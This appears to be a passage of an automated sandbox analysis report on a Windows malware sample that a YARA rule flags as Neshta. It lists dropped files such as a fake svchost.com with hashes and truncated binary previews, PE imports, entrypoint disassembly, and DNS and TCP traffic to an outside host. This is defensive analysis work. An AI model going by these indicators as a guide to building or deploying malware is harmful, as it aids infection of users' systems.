                                                                                                                        Preview: 0.........'......yXh..................6.D. .....w.68a.(,.s....4{FNn....!........(.........A..^.G....7.....*....I.3r...)V@.....u.4.b6.....F.....K...`.=.T...yL.'.f..A......>g...T..........h^o.".2.f..8.}.F.Z%...K$`.....9..<c...Z...|n....k.2V.....G%.1....O....I.O..Fid..u...t.+.....3...".......r...Pg>1.d..D.Q.|:).%.t...&......Z.|..$...N9.H.B_b...N.B..b..l..u..L..x..LD./....G.Pj...^.lg.k.q&.....5..'....&+...._......L.....i!L....B...q*....Q....8s-..O....x...|c.J..X...#........G.......O.2.i........<..3.p.+X6.H.lfr..Y..c.WSuA..W.>..B3[b.u@....-..R..S.tQ....s4..0.;..L..]_...p.......x...l.....:Qq:.;y...M.siD.$..Z.@...0Q..%.f.Pt.....[*.p..]...6M....A.. ..Gs...g...!....*)=......V.w..&.R.A...2..;...h...p...ji.l.Y..7 ..Y~..M..&i.:..-..q*...%X......]..{t....f./{...R.3.N.."(..B..."]...........%.f.;.Qgs.[H..........{~a....]..3IJ).....j..s.xrm..$...l.{i.[];,.Wr.$....:._.F...eK.G..u..3.N........M.O{..A.7.`U.g..s:..........W..CW."V~..B.....Z....,R@..1G$>..\.....h.N.B
                                                                                                                        C:\Users\user\AppData\Local\Temp\CR_0E027.tmp\setup.exe
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.265455130586502
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCnaBqYq8A5V626j2yk+w9PajrxWfv:sr85Cnas/8OUx2ykUGv
                                                                                                                        MD5:BB762A775319A10BBC68B0EA9822F00E
                                                                                                                        SHA1:6BE26E938DCC437BDE58003D1314412C1EAB6550
                                                                                                                        SHA-256:1AC2F8C8F2D4F2257C9F762D44E760420940AE2E518DD4C5A2DD573077BB93A3
                                                                                                                        SHA-512:1C1B1E23140987DFC728CC02F57F2BB8D39E00ABEEF34D0C13B67555CAB231B35C73C3004B3EAD84936903629FF25D4D42165A26D569DD2260895E2C17E3A1FE
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\bziwxza
                                                                                                                        Process:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):61971
                                                                                                                        Entropy (8bit):4.933303950920903
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:DJqTIEc/NgVuCAfdv8lPh61tKgIljnK64ih0cal2JP:DwTPcUuCWv8T66gIlKeh07kR
                                                                                                                        MD5:9E9935B531E598DEC723DE1C106FED7B
                                                                                                                        SHA1:9DB5D6D672F27330951176048EA0B514B5701E94
                                                                                                                        SHA-256:0A4BC0526B41E32E7E729CA7E8F6D8BCCFD14CB196915B71D0E5E9A1776B2ED8
                                                                                                                        SHA-512:CCF60790885EC956CC634FDB0EF91B05C80D5877B1B612D426027282907E7E34E458A9C0CA36CEF2A65D40695C8A308183BD9329E3D83CB4245EC0475F037D93
                                                                                                                        Malicious:false
                                                                                                                        Preview: U.."........P...*.Q...3.R...b.S.....T.....U.....V.....W...%.X...".Y.....Z.....[.....\.....].....^....._.....`...f.a.....b.....c...}.d.....e.....f.....g.....h.....i.....j.....k.....l.....m.....n.....o.....p.....q.....r.....s.....t.....u...I.v.....w.....x.....y.....z.....{.....|.....}.....~...................../.............................%.....r.....%...................................>.....e.................|...........................................................|................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\nse728B.tmp\System.dll
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11264
                                                                                                                        Entropy (8bit):5.568877095847681
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
                                                                                                                        MD5:C17103AE9072A06DA581DEC998343FC1
                                                                                                                        SHA1:B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
                                                                                                                        SHA-256:DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
                                                                                                                        SHA-512:D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
                                                                                                                        Malicious:false
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L......K...........!................0).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text...1........................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\nsrAB5E.tmp\System.dll
                                                                                                                        Process:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11264
                                                                                                                        Entropy (8bit):5.568877095847681
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
                                                                                                                        MD5:C17103AE9072A06DA581DEC998343FC1
                                                                                                                        SHA1:B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
                                                                                                                        SHA-256:DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
                                                                                                                        SHA-512:D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
                                                                                                                        Malicious:false
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L......K...........!................0).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text...1........................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp5023.tmp
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:Non-ISO extended-ASCII text, with NEL line terminators
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):8
                                                                                                                        Entropy (8bit):3.0
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:BXr4:u
                                                                                                                        MD5:085EFDA28BD4046401B918F2D69DEF43
                                                                                                                        SHA1:748B740D74399A8E275CF160ED01AED170CA31D7
                                                                                                                        SHA-256:46FFB274FEC82AAEAFE546A83591DE331B98B677A4C82C16C74D36897248D6A2
                                                                                                                        SHA-512:15299B5515E5F8DCC89E03B61C59329EA108F2EC19E35CDC099814C8E81B4C72EE95EFF293B7163C292851DD4DF68A6A37E29F804E82D4C04A53A8E63A9A9F1F
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..6.?.&A
                                                                                                                        C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):243189
                                                                                                                        Entropy (8bit):7.925477612699072
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:8Qq+a3CstoxrFKLP+BFY0GfiqlMthQtpAp:TayYbyuiqS1p
                                                                                                                        MD5:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        SHA1:97CCC229FE85D8A904152EB5DAF42AA6638A2FB6
                                                                                                                        SHA-256:D2D80FB82C8B5D7315EACC3109C9A108C67A2961402941FDB996094A68E4A21C
                                                                                                                        SHA-512:6AADAFC7FD20CB9FB2FE0BDF47EF78815037C6B9EEDB33DFFE561C623DB89ABE98A7827A9C861C35997EC48207AF855A51CB11145FE888E7039C0265E9146384
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        C:\Windows\directx.sys
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):108
                                                                                                                        Entropy (8bit):4.358111169474199
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:oNN+EaKC5zJF58NELkATwON+EaKC5zJF58NELkAy:oNN7aZ5zJF5cEgewON7aZ5zJF5cEg9
                                                                                                                        MD5:52AA0BDB0E60DC63867FE87CEA4725D7
                                                                                                                        SHA1:621CC3CAB5C4C31C9701F985531C94B95B287BC7
                                                                                                                        SHA-256:7BFA2255458C2FC99DE4610A24080B63F615E09D436F1CBA915165DAB92CD66B
                                                                                                                        SHA-512:9AE5AF558C8756C20B80B31570E1BF8A94798CECB4C6B13C9CF64198E0362D74F2CBD0EE0EC139F4C1172B5DB461D33C4C765A1DE854A35C208BCD2EE2C17F74
                                                                                                                        Malicious:true
                                                                                                                        Preview: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe..C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe..
                                                                                                                        C:\Windows\svchost.com
                                                                                                                        Process:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):41472
                                                                                                                        Entropy (8bit):6.099304243780631
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ:JxqjQ+P04wsmJC
                                                                                                                        MD5:713C9023AF9454658983BDEEC3B3F4D4
                                                                                                                        SHA1:5EB4BF3CE89FB0537313C755E19BB940E5F5D0CF
                                                                                                                        SHA-256:F26FA29BBBE62DAB875487C1060F802970ED8E9A1CAF2F9CA9131692EDAE1D9C
                                                                                                                        SHA-512:4062505A12893D2823877D59486DD2E39AE26441C7B11530732C0751EB1F91F539E180F2B178CDE60845EBE1829DE31D0219A5F6613565719A6D8A133A1D429B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.789687408663417
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 97.38%
                                                                                                                        • Win32 Executable Borland Delphi 6 (262906/60) 2.56%
                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        File name:vi0EwpbUht.exe
                                                                                                                        File size:284661
                                                                                                                        MD5:f478c15f5affd8359762b8c6b0e913a4
                                                                                                                        SHA1:05b36949abd35a132488158f38149c7b582c8d3a
                                                                                                                        SHA256:e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
                                                                                                                        SHA512:31f7f6d622fc730d5822f40a75e08fc2a48001f8cd696d4d3cb0ebebd45904f4bcc7f8b8dad0866a78baa056316b53d8d2c3b3298c5e0ec441a0fe202e350895
                                                                                                                        SSDEEP:6144:k923CstoxrFKLP+BFY0GfiqlMthQtpAEQq+6:nyYbyuiqS176
                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b2a88c96b2ca6a72

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x4080e4
                                                                                                                        Entrypoint Section:CODE
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                                        DLL Characteristics:
                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:9f4693fc0c511135129493f2161d1e86

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        add esp, FFFFFFE0h
                                                                                                                        xor eax, eax
                                                                                                                        mov dword ptr [ebp-20h], eax
                                                                                                                        mov dword ptr [ebp-18h], eax
                                                                                                                        mov dword ptr [ebp-1Ch], eax
                                                                                                                        mov dword ptr [ebp-14h], eax
                                                                                                                        mov eax, 00408054h
                                                                                                                        call 00007F8318365847h
                                                                                                                        xor eax, eax
                                                                                                                        push ebp
                                                                                                                        push 00408220h
                                                                                                                        push dword ptr fs:[eax]
                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                        mov eax, 004091A8h
                                                                                                                        mov ecx, 0000000Bh
                                                                                                                        mov edx, 0000000Bh
                                                                                                                        call 00007F8318368991h
                                                                                                                        mov eax, 004091B4h
                                                                                                                        mov ecx, 00000009h
                                                                                                                        mov edx, 00000009h
                                                                                                                        call 00007F831836897Dh
                                                                                                                        mov eax, 004091C0h
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h
                                                                                                                        call 00007F8318368969h
                                                                                                                        mov eax, 004091DCh
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h
                                                                                                                        call 00007F8318368955h
                                                                                                                        mov eax, dword ptr [00409210h]
                                                                                                                        mov ecx, 0000000Bh
                                                                                                                        mov edx, 0000000Bh
                                                                                                                        call 00007F8318368941h
                                                                                                                        call 00007F8318368998h
                                                                                                                        lea edx, dword ptr [ebp-14h]
                                                                                                                        xor eax, eax
                                                                                                                        call 00007F8318366282h
                                                                                                                        mov eax, dword ptr [ebp-14h]
                                                                                                                        call 00007F8318366816h
                                                                                                                        cmp eax, 0000A200h
                                                                                                                        jle 00007F8318369A37h
                                                                                                                        call 00007F8318368F16h
                                                                                                                        call 00007F8318369729h
                                                                                                                        mov eax, 004091C4h
                                                                                                                        mov ecx, 00000003h
                                                                                                                        mov edx, 00000003h

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x150000x864.idata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000x1400.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x5cc.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x170000x18.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        CODE0x10000x722c0x7400False0.617355872845data6.51167217489IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        DATA0x90000x2180x400False0.3623046875data3.15169834056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        BSS0xa0000xa8990x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .idata0x150000x8640xa00False0.37421875data4.17385976895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .tls0x160000x80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x170000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x180000x5cc0x600False0.848307291667data6.44309346589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x190000x14000x1400False0.2041015625data2.6426621724IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x191500x10a8dataRussianRussia
                                                                                                                        RT_RCDATA0x1a1f80x10data
                                                                                                                        RT_RCDATA0x1a2080xacdata
                                                                                                                        RT_GROUP_ICON0x1a2b40x14dataRussianRussia

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                        user32.dllGetKeyboardType, MessageBoxA
                                                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen
                                                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                        advapi32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                        kernel32.dllWriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                                        gdi32.dllStretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                                                                                                        user32.dllReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                                                                                                        shell32.dllShellExecuteA, ExtractIconA

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        RussianRussia

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        06/10/21-20:54:57.211914TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.6

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 10, 2021 20:54:57.030077934 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.072468996 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.072818995 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.072968960 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.116158962 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.211914062 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.211961985 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.213359118 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.213489056 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.255644083 CEST804975334.102.136.180192.168.2.6

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 10, 2021 20:52:56.466655016 CEST5177453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:56.516782045 CEST53517748.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:52:57.555850029 CEST5602353192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:57.606200933 CEST53560238.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:52:58.671271086 CEST5838453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:58.729799986 CEST53583848.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:52:59.605499029 CEST6026153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:59.655922890 CEST53602618.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:00.397624016 CEST5606153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:00.450397968 CEST53560618.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:01.908998013 CEST5833653192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:01.959418058 CEST53583368.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:02.707798004 CEST5378153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:02.758057117 CEST53537818.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:03.849318981 CEST5406453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:03.899388075 CEST53540648.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:06.596693039 CEST5281153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:06.655294895 CEST53528118.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:07.859206915 CEST5529953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:07.921375036 CEST53552998.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:09.044658899 CEST6374553192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:09.104645014 CEST53637458.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:10.205240011 CEST5005553192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:10.258629084 CEST53500558.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:12.100763083 CEST6137453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:12.153758049 CEST53613748.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:13.241920948 CEST5033953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:13.294929028 CEST53503398.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:14.121953011 CEST6330753192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:14.183816910 CEST53633078.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:15.152836084 CEST4969453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:15.211072922 CEST53496948.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:16.731596947 CEST5498253192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:16.792953014 CEST53549828.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:30.056799889 CEST5001053192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:30.125757933 CEST53500108.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:51.309299946 CEST6371853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:51.369638920 CEST53637188.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:51.744307041 CEST6211653192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:51.818675995 CEST53621168.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:02.000946999 CEST6381653192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:02.061093092 CEST53638168.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:06.364775896 CEST5501453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:06.521516085 CEST53550148.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:07.205995083 CEST6220853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:07.366110086 CEST53622088.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:07.993515015 CEST5757453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:08.060493946 CEST53575748.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:08.428529024 CEST5181853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:08.492145061 CEST53518188.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:09.036667109 CEST5662853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:09.098541021 CEST53566288.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:10.033778906 CEST6077853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:10.095422983 CEST53607788.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:10.859957933 CEST5379953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:10.918298960 CEST53537998.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:11.751101017 CEST5468353192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:11.804127932 CEST53546838.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:12.925803900 CEST5932953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:12.979228973 CEST53593298.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:16.933178902 CEST6402153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:16.994709015 CEST53640218.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:17.769121885 CEST5612953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:17.828820944 CEST53561298.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:39.738754034 CEST5817753192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:39.799232960 CEST53581778.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:56.943981886 CEST5070053192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST53507008.8.8.8192.168.2.6

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jun 10, 2021 20:54:56.943981886 CEST192.168.2.68.8.8.80x2681Standard query (0)www.agileintelligence.coachA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
